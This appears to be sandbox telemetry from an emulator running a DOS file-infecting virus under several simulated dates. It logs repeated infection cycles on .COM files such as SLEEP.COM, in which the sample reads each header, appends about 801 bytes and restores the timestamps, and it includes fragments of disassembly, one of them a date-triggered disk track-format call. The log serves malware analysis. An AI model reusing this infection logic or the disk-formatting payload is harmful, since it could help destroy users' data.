0x151de: lea dx, word ptr [bp + 0x406]
0x151e2: int 0x21
0x151e4: mov bx, word ptr ds:[bp + 0x3f6]
0x151e9: cmp word ptr cs:[bp + 0x409], 0x5850
0x151f0: je 0x151f5
0x151f2: jmp 0x151f7
0x151f4: nop
0x151f5: jmp 0x151a4
2018-12-25T11:55:05.90273368Z 78 PC: 1519f | Find first file
2018-12-25T11:55:05.91012805Z 61 PC: 15259 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:05.916760115Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:55:05.924479472Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.931769998Z 64 PC: 15227 | Write file or device (Write 5 bytes on handle 6)
2018-12-25T11:55:05.93513314Z 66 PC: 1522f | Move file pointer
2018-12-25T11:55:05.936852433Z 64 PC: 1523a | Write file or device (Write 801 bytes on handle 6)
2018-12-25T11:55:05.951665006Z 87 PC: 15249 | Get or set file date and time
2018-12-25T11:55:05.961118463Z 62 PC: 1524d | Close file
2018-12-25T11:55:05.969471964Z 79 PC: 151a8 | Find next file
2018-12-25T11:55:05.97247565Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.976987786Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.981103851Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.985192955Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.987469225Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.98837672Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.99364821Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.996043549Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.004305946Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.007830569Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.015718399Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.022411061Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.034513255Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:06.042956795Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:06.04436082Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:06.05237627Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:06.054630094Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.062642667Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.065221111Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.072018607Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.078437658Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.085206122Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:06.088754857Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:06.090337631Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:06.098803018Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:06.101199132Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.10902617Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.111933053Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.118867988Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.126528826Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.131234522Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:06.134107171Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:06.136007139Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:06.138976706Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:06.140656699Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.143028151Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.145818351Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.152466722Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.159509302Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.171115393Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:06.177546938Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:06.179135423Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:06.187585286Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:06.189137054Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.197671067Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.200275814Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.206632985Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.213907209Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.220743919Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:06.223740344Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:06.22619848Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:06.23491726Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:06.236668537Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.245315158Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.247994302Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.254759357Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.261880483Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.264451515Z 59 PC: 151b5 | Change current directory
2018-12-25T11:55:06.268561422Z 59 PC: 1518c | Change current directory
2018-12-25T11:55:06.270857006Z 26 PC: 15193 | Set disk transfer address
2018-12-25T11:55:06.272055156Z 9 PC: 12aa4 | Display string (String= ' This file is infected with a virus! Pre infection file size = 10,000 ')
2018-12-25T11:55:06.275835778Z 76 PC: 12aa9 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5645,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:06.037609684Z 64 PC: 0 | Write file or device (Write 2 bytes on handle 1)
2018-12-25T11:55:06.046603876Z 41 PC: 94fae | Parse filename
2018-12-25T11:55:06.064769871Z 41 PC: 9502f | Parse filename
2018-12-25T11:55:06.06741968Z 41 PC: 9504c | Parse filename
2018-12-25T11:55:06.070369511Z 26 PC: 984f7 | Set disk transfer address
2018-12-25T11:55:06.073030024Z 71 PC: 986f3 | Get current directory
2018-12-25T11:55:06.08050407Z 78 PC: 986fe | Find first file
2018-12-25T11:55:06.107555598Z 71 PC: 986f3 | Get current directory (See above)
2018-12-25T11:55:06.111223703Z 78 PC: 986fe | Find first file (See above)
2018-12-25T11:55:06.131406249Z 64 PC: 9a848 | Write file or device (Write 26 bytes on handle 2)
2018-12-25T11:55:06.140830627Z 37 PC: 123c4 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T11:55:06.148348704Z 37 PC: 123cb | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T11:55:06.150377531Z 37 PC: 123d2 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:55:06.152084736Z 62 PC: 122ab | Close file
2018-12-25T11:55:06.154141922Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.157120683Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.158770068Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.160423773Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.162750978Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.164416435Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.165884109Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.168036918Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.170110482Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.171709708Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.173887992Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.175567807Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.178023019Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.180779453Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.183755286Z 99 PC: 9a5d7 | Get DBCS lead byte table pointer
2018-12-25T11:55:06.185578451Z 56 PC: 94df9 | Get or set country info
2018-12-25T11:55:06.188383565Z 64 PC: 9a848 | Write file or device (See above)
2018-12-25T11:55:06.199154396Z 25 PC: 94e62 | Get default drive
2018-12-25T11:55:06.20120382Z 71 PC: 970dd | Get current directory
2018-12-25T11:55:06.205880355Z 64 PC: 9a848 | Write file or device (See above)
2018-12-25T11:55:06.210482003Z 2 PC: 970b2 | Character output (Char = '3e')
2018-12-25T11:55:06.212971245Z 93 PC: 94f20 | File sharing functions
2018-12-25T11:55:06.215868067Z 93 PC: 94f27 | File sharing functions
2018-12-25T11:55:06.232299589Z 10 PC: 94f39 | Buffered keyboard input
2018-12-25T11:55:21.083995984Z 0 PC: 0 | Program terminate (See above)
2018-12-25T11:55:22.439024372Z 0 PC: 0 | Program terminate (See above)
2018-12-25T11:55:22.541639532Z 64 PC: 9a848 | Write file or device (See above)
2018-12-25T11:55:22.548623516Z 41 PC: 94fae | Parse filename (See above)
2018-12-25T11:55:22.552335265Z 41 PC: 9502f | Parse filename (See above)
2018-12-25T11:55:22.556029932Z 41 PC: 9504c | Parse filename (See above)
2018-12-25T11:55:22.559062952Z 26 PC: 984f7 | Set disk transfer address (See above)
2018-12-25T11:55:22.561641003Z 71 PC: 986f3 | Get current directory (See above)
2018-12-25T11:55:22.570928574Z 78 PC: 986fe | Find first file (See above)
2018-12-25T11:55:22.581498535Z 71 PC: 9856c | Get current directory
2018-12-25T11:55:22.585333366Z 73 PC: 97c09 | Release memory
2018-12-25T11:55:22.589414717Z 75 PC: 11821 | Execute program
2018-12-25T11:55:22.606021575Z 9 PC: 12a47 | Display string (String= 'Hello, World! ')
2018-12-25T11:55:22.610553421Z 76 PC: 12a4b | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5645,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:06.109553108Z 26 PC: 15157 | Set disk transfer address
2018-12-25T11:55:06.112251342Z 26 PC: 15171 | Set disk transfer address
2018-12-25T11:55:06.113945625Z 71 PC: 1517b | Get current directory
2018-12-25T11:55:06.118679774Z 42 PC: 1525f | Get date
0x1525f: cmp dl, 0x1e
0x15262: je 0x15265
0x15264: ret
0x15265: mov ah, 0xf
0x15267: int 0x10
0x15269: mov ah, 0
0x1526b: int 0x10
0x1526d: mov ah, 9
0x1526f: lea dx, word ptr [bp + 0x238]
0x15273: int 0x21
0x15275: ret
0x15276: mov ah, 5
0x15278: mov ch, 0
0x1527a: mov dh, 0
0x1527c: mov dl, byte ptr [0x431]
0x15280: int 0x13
0x15282: ret
0x15283: and dh, dl
2018-12-25T11:55:06.122972217Z 42 PC: 151bd | Get date
0x151bd: cmp dl, 1
0x151c0: je 0x151c3
0x151c2: ret
0x151c3: mov al, byte ptr [0x431]
0x151c6: call 0x15276
0x151c9: cmp byte ptr [0x431], 4
0x151ce: je 0x15194
0x151d0: inc byte ptr [0x431]
0x151d4: loop 0x151c3
0x151d6: call 0x15250
0x151d9: mov ah, 0x3f
0x151db: mov cx, 0x1a
0x151de: lea dx, word ptr [bp + 0x406]
0x151e2: int 0x21
0x151e4: mov bx, word ptr ds:[bp + 0x3f6]
0x151e9: cmp word ptr cs:[bp + 0x409], 0x5850
0x151f0: je 0x151f5
0x151f2: jmp 0x151f7
0x151f4: nop
0x151f5: jmp 0x151a4
2018-12-25T11:55:06.127813369Z 78 PC: 1519f | Find first file
2018-12-25T11:55:06.134848121Z 61 PC: 15259 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:06.142850797Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:55:06.150102392Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.157922476Z 64 PC: 15227 | Write file or device (Write 5 bytes on handle 6)
2018-12-25T11:55:06.162323554Z 66 PC: 1522f | Move file pointer
2018-12-25T11:55:06.16437965Z 64 PC: 1523a | Write file or device (Write 801 bytes on handle 6)
2018-12-25T11:55:06.181242263Z 87 PC: 15249 | Get or set file date and time
2018-12-25T11:55:06.183320933Z 62 PC: 1524d | Close file
2018-12-25T11:55:06.192878826Z 79 PC: 151a8 | Find next file
2018-12-25T11:55:06.197184879Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.205027956Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.213880231Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.221946494Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:06.225158546Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:06.227916803Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:06.237482602Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:06.239808705Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.249648921Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.253165042Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.261807443Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.269935962Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.277484822Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:06.281040009Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:06.283714454Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:06.292767768Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:06.294565619Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.30408597Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.314134836Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.321906941Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.330013912Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.338534258Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:06.342015197Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:06.344005351Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:06.353947783Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:06.355804967Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.371233618Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.375096641Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.38264313Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.390247327Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.396064459Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:06.39915443Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:06.401199943Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:06.405959469Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:06.408111607Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.410481236Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.413979944Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.421787931Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.429099961Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.436560182Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:06.440005057Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:06.441927382Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:06.451855954Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:06.454526303Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.464059426Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.467367271Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.475891677Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.483798385Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.491545199Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:06.496437639Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:06.498276458Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:06.50810086Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:06.510262518Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.520642307Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.523984051Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.532952797Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.537023773Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.539886802Z 59 PC: 151b5 | Change current directory
2018-12-25T11:55:06.544623571Z 59 PC: 1518c | Change current directory
2018-12-25T11:55:06.547403969Z 26 PC: 15193 | Set disk transfer address
2018-12-25T11:55:06.548845242Z 9 PC: 12aa4 | Display string (String= ' This file is infected with a virus! Pre infection file size = 10,000 ')
2018-12-25T11:55:06.559419422Z 76 PC: 12aa9 | Terminate with return code (Return code = '1')